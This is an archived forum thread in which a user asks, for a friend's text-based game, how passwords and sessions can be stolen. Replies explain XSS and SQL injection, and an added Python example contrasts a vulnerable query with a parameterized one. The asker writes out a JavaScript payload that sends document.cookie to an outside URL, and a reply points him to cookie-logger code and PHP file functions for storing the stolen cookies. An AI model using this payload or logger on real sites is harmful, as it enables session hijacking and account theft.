View Full Version : SessionID's, ETC.



Delay
01-28-2009, 02:58 PM
Hello,

Let me first introduce myself, since I'm new to this forum.
My real name is Robin, I'm a 25 year old male and live in the Netherlands (so already excuse me if I'm hard to understand:P)

I'm currently helping my friend, who is working on a text-based game. He asked me to find any ways of trying to steal users' passwords, through session IDs and whatever else is available.

Which possibilities are there to actually 'steal' someone's password?
If you need any more information, I'd be pleased to give it to you.

All the best,

Delay

Moonbat
01-28-2009, 06:00 PM
Welcome to the forums :)

To answer your question, there are a few ways.

XSS (Cross-Site Scripting) consists of running malicious JavaScript on another user's PC. You can use XSS to run a script on a user that will steal their cookie(s) that they have for your website. The attacker can use the cookies and hijack the user's session and take control of his account. Read more on XSS here:

http://en.wikipedia.org/wiki/Cross-site_scripting

Another technique, SQL Injection, consists of exploiting a poorly-filtered query to a database. If proper data-sanitation techniques aren't used on an application or application component that interacts with your database, the attacker can inject extra SQL into the query and run it. For example, if you have a search box that processes the user's input and queries a database to get results, an attacker could run multiple malicious SQL queries from that search box, if you don't filter the user input correctly. Read more on SQL Injection here:

http://en.wikipedia.org/wiki/SQL_injection

Those are two common vulnerabilities to look out for.
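
The search-box case described in the post above, as an added example that is not part of the original thread: the same search written once with string concatenation and once with a bound parameter. Python with an in-memory SQLite database stands in for the game's real stack; the `items` table, its rows and the function names are constructed for illustration.

```python
import sqlite3

# Constructed sample data: a hypothetical item table for a text-based game.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (name TEXT, hidden INTEGER)")
    db.executemany(
        "INSERT INTO items VALUES (?, ?)",
        [("iron sword", 0), ("wooden shield", 0), ("admin key", 1)],
    )
    return db

def search_unsafe(db, term):
    # Vulnerable: user input is pasted into the SQL text, so quote characters
    # in `term` change the structure of the query, not just the search value.
    sql = ("SELECT name FROM items WHERE hidden = 0 AND name LIKE '%"
           + term + "%'")
    return [row[0] for row in db.execute(sql)]

def search_safe(db, term):
    # Hardened: the query text is fixed and the input is bound as a parameter.
    # LIKE wildcards in the input are escaped so they only match literally.
    esc = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT name FROM items WHERE hidden = 0 "
           "AND name LIKE ? ESCAPE '\\'")
    return [row[0] for row in db.execute(sql, ("%" + esc + "%",))]

# Constructed input containing a quote, as typed into the search box.
CRAFTED = "' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print("unsafe, normal term :", search_unsafe(db, "sword"))
    print("unsafe, crafted term:", search_unsafe(db, CRAFTED))
    print("safe, normal term   :", search_safe(db, "sword"))
    print("safe, crafted term  :", search_safe(db, CRAFTED))
```

With the concatenated query the crafted term returns the hidden row as well; with the bound parameter it is treated as a literal search string and matches nothing.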

Delay
01-28-2009, 06:24 PM
Alright, thank you and thank you for the help.

So, as far as I read, XSS makes it possible to write down cookies to a webpage, with a little help from JavaScript.

Hmm, interesting fact.

One more question for today:

How exactly do you (when you've implemented JavaScript (document.location='weburlhere' + document.cookie;)) write the requested cookie (and ofc session) to some other place?


Regards,

Delay

Moonbat
01-28-2009, 08:02 PM
How exactly do you (when you've implemented JavaScript (document.location='weburlhere' + document.cookie;)) write the requested cookie (and ofc session) to some other place?
You will have to use PHP to do that. You can find existing code for a cookie logger at this link (http://www.xssed.com/article/6/Paper_Kr*ws_Cross-Site_Scripting_Tutorial/#PART%20VI).

But if you want to write your own PHP cookie logger, you'll have to learn PHP. You can check out the W*Schools PHP Tutorial (http://www.w*schools.com/PHP/DEfaULT.asP), which is a great PHP tutorial site.

But if you already are familiar with PHP programming, just do some reading on file functions like fopen() (http://us2.php.net/manual/en/function.fopen.php) and fwrite() (http://us2.php.net/manual/en/function.fwrite.php).